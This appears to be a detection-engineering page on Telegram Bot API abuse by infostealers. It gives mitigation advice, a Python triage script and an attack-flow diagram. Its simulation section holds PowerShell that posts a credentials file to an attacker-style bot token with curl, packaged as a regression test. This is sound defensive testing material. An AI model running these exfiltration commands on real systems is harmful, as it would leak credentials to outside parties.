The Detection & Response Chronicles: Exploring Telegram Abuse
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The article explains how several threat actors misuse Telegram’s Bot API and channels in enterprises for command and control, data exfiltration, and victim monitoring. Malware families including DeerStealer, Lumma Stealer, Raven Stealer, and a trojanized XWorm builder hard-code bot tokens or channel IDs and call endpoints such as /sendMessage and /sendDocument. It includes Microsoft Defender and Sentinel detection queries focused on suspicious process command lines and traffic to api.telegram.org. Key guidance is to baseline legitimate Telegram use and block the API where it isn’t needed.
Investigation
NVISO’s SOC reported four intrusion attempts observed between March 2025 and October 2025 in which Telegram was used at different points in the attack lifecycle. The write-up highlights campaigns such as Lunar Spider monitoring victims via fake captcha lures, DeerStealer sending operator notifications through curl, Lumma Stealer pulling C2 details from Telegram channels, Raven Stealer exfiltrating archived collections, and an XWorm builder relying on the Bot API for both exfiltration and C2. Analysts extracted indicators including process command lines, network destinations, and relevant file names.
Mitigation
Establish a baseline for legitimate Telegram usage, then block outbound access to api.telegram.org in environments where it is not required. Watch for uncommon processes (e.g., curl, powershell, wscript) initiating connections to the API and investigate any scripted Bot API interactions. Tune detections to suppress expected behavior such as known browsers launching telegram.exe, and prioritize long-polling or webhook-style requests originating from suspicious binaries or unexpected hosts.
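As an added example (not from the NVISO write-up or the page's own Defender/Sentinel queries), the triage logic from the mitigation guidance applied to constructed process-creation events: flag processes whose command line references api.telegram.org, suppress the desktop client launched by a known browser, classify scripted Bot API calls by method, and redact the bot token before it lands in an alert. The event field names (host, file, parent, cmdline) are assumptions standing in for the equivalent Defender process-event columns.

```python
import re

# Bot API methods grouped by the role they play in the abuse described above.
EXFIL_METHODS = {"sendMessage", "sendDocument", "sendPhoto"}
C2_METHODS = {"getUpdates", "setWebhook", "getWebhookInfo"}
KNOWN_BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
BOT_CALL = re.compile(r"https?://api\.telegram\.org/bot([^/\s'\"]+)/(\w+)", re.I)

# Constructed sample events: WS01 mirrors the simulation command on this page, the rest are made up.
EVENTS = [
    {"host": "WS01", "file": "curl.exe", "parent": "powershell.exe",
     "cmdline": 'curl.exe -X POST -F "document=@C:\\Temp\\creds.txt" '
                '"https://api.telegram.org/bot123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11/sendDocument?chat_id=987654321"'},
    {"host": "WS02", "file": "wscript.exe", "parent": "explorer.exe",
     "cmdline": "wscript.exe //B poll.js https://api.telegram.org/bot111:TOKEN/getUpdates?offset=1"},
    {"host": "WS03", "file": "powershell.exe", "parent": "cmd.exe",
     "cmdline": "powershell -c iwr https://api.telegram.org/file/bot111:TOKEN/documents/stage2.bin"},
    {"host": "WS04", "file": "telegram.exe", "parent": "chrome.exe",
     "cmdline": "telegram.exe -- https://api.telegram.org/"},
    {"host": "WS05", "file": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell -c iwr https://example.com/update.zip"},
]

def redact_token(token):
    """Keep only the numeric bot id so analysts can pivot without storing the secret."""
    return token.split(":", 1)[0] + ":<redacted>"

def triage(event):
    """Return a finding dict for one process-creation event, or None if benign/expected."""
    cmd = event["cmdline"]
    if "api.telegram.org" not in cmd.lower():
        return None
    proc, parent = event["file"].lower(), event["parent"].lower()
    # Baseline suppression from the guidance: the desktop client started by a known browser is expected.
    if proc == "telegram.exe" and parent in KNOWN_BROWSERS:
        return None
    finding = {"host": event["host"], "process": proc, "parent": parent, "method": None,
               "bot": None, "kind": "telegram-api-reference", "severity": "medium"}
    m = BOT_CALL.search(cmd)
    if m:  # a scripted Bot API call: classify by method and redact the token
        finding["bot"], finding["method"] = redact_token(m.group(1)), m.group(2)
        if m.group(2) in EXFIL_METHODS:
            finding.update(kind="exfiltration", severity="high")
        elif m.group(2) in C2_METHODS:
            finding.update(kind="c2-polling", severity="high")
    return finding

def triage_all(events):
    return [f for f in map(triage, events) if f]
```

Running triage_all(EVENTS) yields findings for WS01 (sendDocument, exfiltration), WS02 (getUpdates, C2 polling) and WS03 (a /file/ download path with no method match, left at medium), while the browser-launched client and the unrelated download produce none.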
Response
When activity is detected, isolate the affected endpoint, stop suspicious processes, and preserve command-line arguments along with DNS, proxy, and network telemetry. Perform deeper forensics to identify follow-on payloads associated with campaigns like DeerStealer or Raven Stealer. Rotate any exposed bot tokens, disable or revoke abused Telegram channels, and contain the spread by blocking related indicators. If abuse is confirmed, escalate reporting through Telegram’s official channels and document the incident for recurrence prevention.
graph TB
    %% Class definitions
    classDef technique fill:#ffcc99
    classDef tool fill:#c2f0c2
    classDef process fill:#c2d6f0
    classDef malware fill:#f9c2ff
    classDef operator fill:#ff9900

    %% Nodes – Techniques
    attack_user_execution["<b>Technique</b> – <b>T1204 User Execution</b>: Victims are tricked into running a malicious executable bundled in a fake Google Chrome update."]
    class attack_user_execution technique
    attack_software_extensions["<b>Technique</b> – <b>T1176 Software Extensions</b>: A compromised WordPress plugin injects malicious iframes to deliver the fake update."]
    class attack_software_extensions technique
    action_archive_data["<b>Technique</b> – <b>T1560.001 Archive via Utility</b>: PowerShell archives harvested files into a ZIP archive."]
    class action_archive_data technique
    tech_compression["<b>Technique</b> – <b>T1027.015 Compression</b>: ZIP archive compresses data to reduce size for exfiltration."]
    class tech_compression technique
    process_powershell["<b>Process</b> – <b>T1059.001 PowerShell</b>: Executes archiving and later invokes curl for transmission."]
    class process_powershell process
    action_curl["<b>Action</b> – Curl: PowerShell calls curl to send the archive to the C2 server."]
    class action_curl tool
    tech_dead_drop["<b>Technique</b> – <b>T1102.001 Dead Drop Resolver</b>: Malware communicates with Telegram Bot API endpoints."]
    class tech_dead_drop technique
    tech_messaging_exfil["<b>Technique</b> – <b>T1213.005 Messaging Applications</b>: System information and credentials are exfiltrated via Telegram chats/bots."]
    class tech_messaging_exfil technique
    tech_unsecured_creds["<b>Technique</b> – <b>T1552.008 Unsecured Credentials</b>: Discord tokens and saved passwords are sent as chat messages."]
    class tech_unsecured_creds technique
    tech_data_obfusc["<b>Technique</b> – <b>T1001 Data Obfuscation</b>: Telegram channel names are encrypted with ROT13/ROT15."]
    class tech_data_obfusc technique
    tech_dynamic_resolution["<b>Technique</b> – <b>T1568 Dynamic Resolution</b>: Malware decodes the obfuscated identifier at runtime."]
    class tech_dynamic_resolution technique
    tech_exfil_c2["<b>Technique</b> – <b>T1041 Exfiltration Over C2 Channel</b>: Compressed archive and stolen data are sent over the Telegram channel."]
    class tech_exfil_c2 technique

    %% Nodes – Tools / Malware
    tool_fake_update["<b>Malware</b> – Fake Chrome Update: Malicious executable delivered to victims."]
    class tool_fake_update malware
    tool_wordpress_plugin["<b>Tool</b> – WordPress Plugin <i>header-fix-tester</i>: Injects malicious iframes."]
    class tool_wordpress_plugin tool

    %% Operator nodes (optional)
    op_and1(("AND"))
    class op_and1 operator

    %% Connections – Attack Flow
    attack_user_execution -->|delivers| tool_fake_update
    attack_software_extensions -->|injects iframe to deliver| tool_fake_update
    tool_fake_update -->|executes via| process_powershell
    process_powershell -->|creates| action_archive_data
    action_archive_data -->|applies| tech_compression
    tech_compression -->|produces archive for| action_curl
    action_curl -->|sends data to| tech_dead_drop
    tech_dead_drop -->|enables| tech_messaging_exfil
    tech_messaging_exfil -->|carries| tech_unsecured_creds
    tech_unsecured_creds -->|uses| tech_data_obfusc
    tech_data_obfusc -->|supports| tech_dynamic_resolution
    tech_dynamic_resolution -->|facilitates| tech_exfil_c2
    tech_exfil_c2 -->|exfiltrates data over| tech_dead_drop

    %% Class assignments
    class tool_fake_update malware
    class tool_wordpress_plugin tool
    class op_and1 operator
Attack Flow
Detections
- Possible Telegram Abuse As Command And Control Channel (via dns_query)
- Suspicious Defender Exclusions Modification (via cmdline)
- Suspicious Process Utilizes a URL in the Command Line (via cmdline)
- IOCs (Emails) to detect: The Detection & Response Chronicles: Exploring Telegram Abuse
- Detect Non-Browser Communication with Telegram API [Windows Network Connection]
- Detection of Malicious Telegram API Usage [Windows Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
- Attack Narrative & Commands: An adversary with a compromised Windows host wishes to exfiltrate a harvested credential file (creds.txt) to a Telegram bot they control. To avoid storing a custom binary, they use the native curl.exe (installed via Windows 10 optional features) to POST the file to https://api.telegram.org/bot<ATTACKER_TOKEN>/sendDocument. The command is executed from PowerShell, ensuring the process creation event records a command line that contains “api.telegram.org”. Because the process is curl.exe, the rule’s filter (InitiatingProcessFileName: "telegram.exe") does not suppress the alert.

    # Variables (replace with attacker-controlled values)
    $BotToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11"
    $ChatID = "987654321"
    $FilePath = "C:\Temp\creds.txt"

    # Ensure the directory and file exist (simulated credential dump)
    New-Item -ItemType Directory -Path (Split-Path $FilePath) -Force | Out-Null
    Set-Content -Path $FilePath -Value "username: admin`npassword: P@ssw0rd!"

    # Execute the exfiltration via Telegram Bot API
    $Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID"
    curl.exe -X POST -F "document=@$FilePath" $Url

- Regression Test Script: The script below reproduces the exact steps, suitable for automated BAS runs.

    #--------------------------------------------
    # Regression Test – Telegram API Exfiltration
    #--------------------------------------------
    param(
        [string]$BotToken = "REPLACE_WITH_TOKEN",
        [string]$ChatID = "REPLACE_WITH_CHATID",
        [string]$TmpDir = "$env:TEMP\TelegramBAS"
    )

    # Create temp workspace
    New-Item -ItemType Directory -Path $TmpDir -Force | Out-Null

    # Simulated credential file
    $CredFile = Join-Path $TmpDir "creds.txt"
    "username: admin`npassword: P@ssw0rd!" | Set-Content -Path $CredFile

    # Build API URL
    $Url = "https://api.telegram.org/bot$BotToken/sendDocument?chat_id=$ChatID"

    # Invoke exfiltration
    Write-Host "[*] Exfiltrating $CredFile to Telegram..."
    curl.exe -X POST -F "document=@$CredFile" $Url

    # Simple success indicator (does not verify delivery)
    if ($LASTEXITCODE -eq 0) {
        Write-Host "[+] Exfiltration command executed."
    } else {
        Write-Error "[-] Exfiltration failed."
    }

- Cleanup Commands: Remove the temporary file and directory; optionally terminate any lingering curl.exe processes.

    # Cleanup temporary artifacts (assumes $TmpDir from the regression script is still in scope)
    Stop-Process -Name "curl" -ErrorAction SilentlyContinue
    Remove-Item -Path $TmpDir -Recurse -Force
    Write-Host "[*] Cleanup complete."